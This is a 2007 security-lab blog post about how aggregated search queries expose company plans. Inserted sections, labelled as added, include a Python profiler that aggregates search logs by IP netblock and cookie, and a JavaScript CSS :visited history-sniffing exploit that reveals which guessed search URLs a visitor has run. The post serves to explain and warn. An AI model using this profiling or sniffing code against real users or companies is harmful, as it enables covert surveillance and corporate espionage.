Blog
Company Information Leakage and Web Search
01.26.2007 - 10:27 AM
A Company Diary?
Imagine the scope and nature of all the web searches that you and your employees do on a daily or weekly basis. A log of such search queries is almost like an intimate diary, isn’t it? Not only are your professional interests laid out quite clearly, but your hobbies, health concerns, family concerns, political slant, travel plans, shopping efforts, dining considerations, and on and on, are all succinctly summarized in your search log.
Now imagine what the combined search log of everyone in your company might look like. Aggregated, those queries can reveal a wide range of proprietary information. Here is a sampling:
- The technology areas you’re currently focusing on
- Shifts in technology focus
- Possible new products or initiatives being planned
- Mergers or acquisitions under consideration
- Key internal products you’re considering, such as a new security system
- Increases in employee job search activity (Internal mismanagement? Undisclosed financial difficulties?)
How are Profiles Created?
Now we’ll take a look at just how these profiles or company diaries get created. First, here are a few ways an individual’s search activity can get tied to that person:
- Cookies
- Network Address
- Registered user accounts
- Browser environment (user agent string, installed plugins, screen size and the like; these may not pinpoint a person on their own, but they narrow the field)
- Online behavior (perhaps you pull the same RSS threads every morning or check the same portfolio of stocks?)
A company might then have a multitude of services across which it aggregates an individual’s activity (think Google Web Search, Blog Search, News Search, Groups, Froogle, Desktop, Reader, Maps, etc.).
Now, how is a company profile created? If your company owns a block of IP addresses, that range is the key. It effectively tags the company with a publicly visible Internet ID, and even a company that owns no block usually presents a single egress address through its firewall or proxy. It is now commonplace for a web service to aggregate activity across an IP range to build group profiles.
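To make the aggregation concrete, here is an added example (not code from the original post or from Websense) that turns a constructed search engine access log into exactly the two kinds of profile described above: a per-person profile keyed on a cookie ID, and a per-company profile keyed on the netblock the client address falls in. The log format, the cookie IDs, the netblock-to-organization table and the query terms are all assumptions made up for the example; the addresses come from the reserved documentation ranges.

```python
import ipaddress
from collections import Counter, defaultdict
from urllib.parse import urlparse, parse_qs

# Constructed sample of a search engine's access log (hypothetical format):
# "<client-ip> <cookie-id> <request-url>", one request per line.
# Addresses are taken from the documentation ranges 198.51.100.0/24 and 203.0.113.0/24.
SAMPLE_LOG = """\
198.51.100.17 c0ffee01 http://www.google.com/search?q=ids+evaluation
198.51.100.17 c0ffee01 http://www.google.com/search?q=snort+vs+commercial+ids
198.51.100.42 c0ffee02 http://www.google.com/search?q=acquire+widgetco
198.51.100.42 c0ffee02 http://www.google.com/search?q=widgetco+valuation
198.51.100.9  c0ffee03 http://www.google.com/search?q=resume+template
198.51.100.9  c0ffee03 http://www.google.com/search?q=job+openings+security+engineer
203.0.113.5   deadbe01 http://www.google.com/search?q=widgetco+valuation
203.0.113.5   deadbe01 http://www.google.com/news?q=ransomware
203.0.113.5   deadbe01 http://www.google.com/
"""

# Hypothetical mapping of netblocks to organizations, as an aggregator could derive
# from WHOIS or routing data. The netblock alone is enough to tag a whole company.
ORG_NETBLOCKS = {
    "198.51.100.0/24": "Example Corp",
    "203.0.113.0/24": "Rival Ltd",
}

STOPWORDS = {"vs", "and", "the", "of", "for"}


def extract_query(url):
    """Return the search terms from a URL's q= parameter, or None if there is none."""
    params = parse_qs(urlparse(url).query)
    q = params.get("q")
    return q[0] if q else None


def org_for_ip(ip):
    """Map a client address to an organization via the netblock table."""
    addr = ipaddress.ip_address(ip)
    for block, org in ORG_NETBLOCKS.items():
        if addr in ipaddress.ip_network(block):
            return org
    return None


def parse_log(log_text):
    """Yield (ip, cookie, query) for every search request in the log."""
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        ip, cookie, url = parts
        q = extract_query(url)
        if q:
            yield ip, cookie, q


def build_profiles(log_text):
    """Aggregate search terms per organization (by netblock) and per individual (by cookie)."""
    company = defaultdict(Counter)
    individual = defaultdict(Counter)
    for ip, cookie, q in parse_log(log_text):
        terms = [t for t in q.lower().split() if t not in STOPWORDS]
        individual[cookie].update(terms)
        org = org_for_ip(ip)
        if org:
            company[org].update(terms)
    return company, individual


def top_terms(counter, n=3):
    """The n most frequent terms in a profile, most frequent first."""
    return [term for term, _ in counter.most_common(n)]


if __name__ == "__main__":
    company, individual = build_profiles(SAMPLE_LOG)
    for org, counter in company.items():
        print(org, top_terms(counter))
    for cookie, counter in individual.items():
        print(cookie, top_terms(counter))
```

Nine log lines already put "ids" and "widgetco" at the top of Example Corp's profile (a security product evaluation and an acquisition target), and the third cookie's profile is a job search. Nothing in the code needed to know who the company was; the netblock did that work.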
The Risk
The bottom line here is that this very proprietary company diary has left the building and is no longer under your control. To make matters worse, there is a general sense that a company's profile isn't as private a matter as an individual's profile. While most companies take great care to say that web profiles of individuals will be kept anonymous (Individually Identifiable Information is generally not shared with affiliates), this is not the case with a company's profile. It's common to see website privacy policies that state they aggregate on the IP address and then share this information with others.
So as your company's profile is proliferated across the web through affiliates and ad networks, is there really a risk it will be exposed? Of course. The more external parties there are with access, the greater the risk of a security breach; the greater the risk of an accidental disclosure; and the greater the risk of one person underestimating the sensitivity of the data. Who could have predicted the AOL debacle? That was just one scientist trying to do "a good thing" and share his research data. Did you know that Amazon once had a feature called "Circle of Friends" where you could view the books most purchased by a particular company? Imagine the uproar if that had been a particular person instead.
SPI Dynamics recently published a white paper showing how JavaScript could be used to steal search engine queries. The main idea is really very simple. In CSS you can give links different styles depending on whether they have been visited or not (the :visited and :link pseudo-classes). In JavaScript you can read the computed style of any element, and so deduce whether a link was visited or not. The key thing is that you first have to guess the complete, exact URL whose style you want to check. When you think about how simple some of the search engine URLs are (http://www.google.com/search?q=mysearchword), this really isn't that hard.
A website owner could then insert this code into his or her own site, or someone of evil intent could insert the code into another’s website via an XSS attack. It’s not hard to imagine one company gleaning a pretty hefty glimpse of its competitor’s search profile. We all visit our competitor’s websites. Who would be more apt to guess exact search URLs than a competitor? Clear your web history!
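The technique described in the two paragraphs above, as an added example that is not code from the original post or from the SPI Dynamics paper. The first half builds the exact candidate search URLs for a list of guessed terms, which is the hard part the post calls out; the second half injects a hidden link per candidate and reads back which colour the :visited rule gave it. The candidate terms and the "probe" class name are made up for the example, and the Google URL form is the one quoted in the post. One caveat a practitioner should know: browsers have closed this hole since roughly 2010 to 2011 (Firefox 4 and the Chrome and Safari releases of that period) by reporting the :link style to scripts regardless of history, so on a current browser sniffVisited returns an empty list even for visited URLs.

```javascript
// Constructed list of query strings an attacker might guess a competitor has searched.
const CANDIDATE_TERMS = ["widgetco valuation", "snort vs commercial ids", "acquire widgetco"];

// Browsers store the URL exactly as requested. A normal search box submits spaces
// as '+', so the guess must encode them that way, not as %20, or the lookup misses.
function encodeQuery(q) {
  return encodeURIComponent(q).replace(/%20/g, "+");
}

// URL templates per engine. Only the Google form from the post is included; any other
// engine added here (an assumption) must reproduce that engine's real URL byte for byte.
const ENGINE_TEMPLATES = {
  google: (q) => "http://www.google.com/search?q=" + encodeQuery(q),
};

// Expand guessed terms into the full candidate URLs to probe.
function buildCandidateUrls(terms, templates = ENGINE_TEMPLATES) {
  const urls = [];
  for (const term of terms) {
    for (const engine of Object.keys(templates)) {
      urls.push({ engine, term, url: templates[engine](term) });
    }
  }
  return urls;
}

// Classic :visited sniff. Injects an off-screen <a> per candidate, styles visited links
// with a distinctive colour, and reads getComputedStyle to see which rule applied.
// Returns null outside a browser (e.g. under Node), so the builder above can still be tested.
function sniffVisited(candidates, doc = typeof document !== "undefined" ? document : null) {
  if (!doc) return null;
  const style = doc.createElement("style");
  style.textContent =
    "a.probe:link { color: rgb(0, 0, 255); } a.probe:visited { color: rgb(255, 0, 0); }";
  doc.head.appendChild(style);
  const hits = [];
  for (const c of candidates) {
    const a = doc.createElement("a");
    a.className = "probe";
    a.href = c.url;
    a.textContent = c.term;
    a.style.position = "absolute";
    a.style.left = "-9999px";
    doc.body.appendChild(a);
    const color = doc.defaultView.getComputedStyle(a).color;
    if (color === "rgb(255, 0, 0)") hits.push(c); // :visited rule applied: URL is in history
    a.remove();
  }
  style.remove();
  return hits;
}

// Usage in a page: const leaked = sniffVisited(buildCandidateUrls(CANDIDATE_TERMS));
// In 2007 'leaked' would list every guessed query the visitor had actually run.
```

The attacker's cost is linear in the number of guesses, and each guess is one DOM node, so probing a few thousand competitor-relevant terms across several engines was entirely practical at the time. The same probe also answers the post's closing advice: after clearing history, every candidate comes back as :link.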
The Future
There’s clearly an increasing trend right now to create web profiles: to track, aggregate, and share information on how individuals and groups use the web. Profile information is routinely bought, sold, and shared. In fact, if you surf on Yahoo!, it’s not just Yahoo! that’s tracking you, it’s also the 37 different ad networks Yahoo! has relationships with that track you with web beacons and cookies. This overall trend for profiling will surely increase, because there’s big money associated with effective ad placement. Simultaneously, because of our growing dependency on the web, these profiles will grow in richness.
Spyware and adware vendors are already tracking where people visit on the web and what they search for. But imagine if more nefarious, malicious code authors started tracking search queries and web surfing habits as a means to build individual identity profiles and company-specific ones. This information could not only assist in identity theft but could also help one gather detailed information about a company to sell.
Consumers have been told "You have zero privacy anyway--Get over it." Companies can't afford to be so laissez-faire; privacy and Information Leak Prevention are fundamental in a competitive, healthy business environment.
Researcher: Amy Steier, Websense Security Labs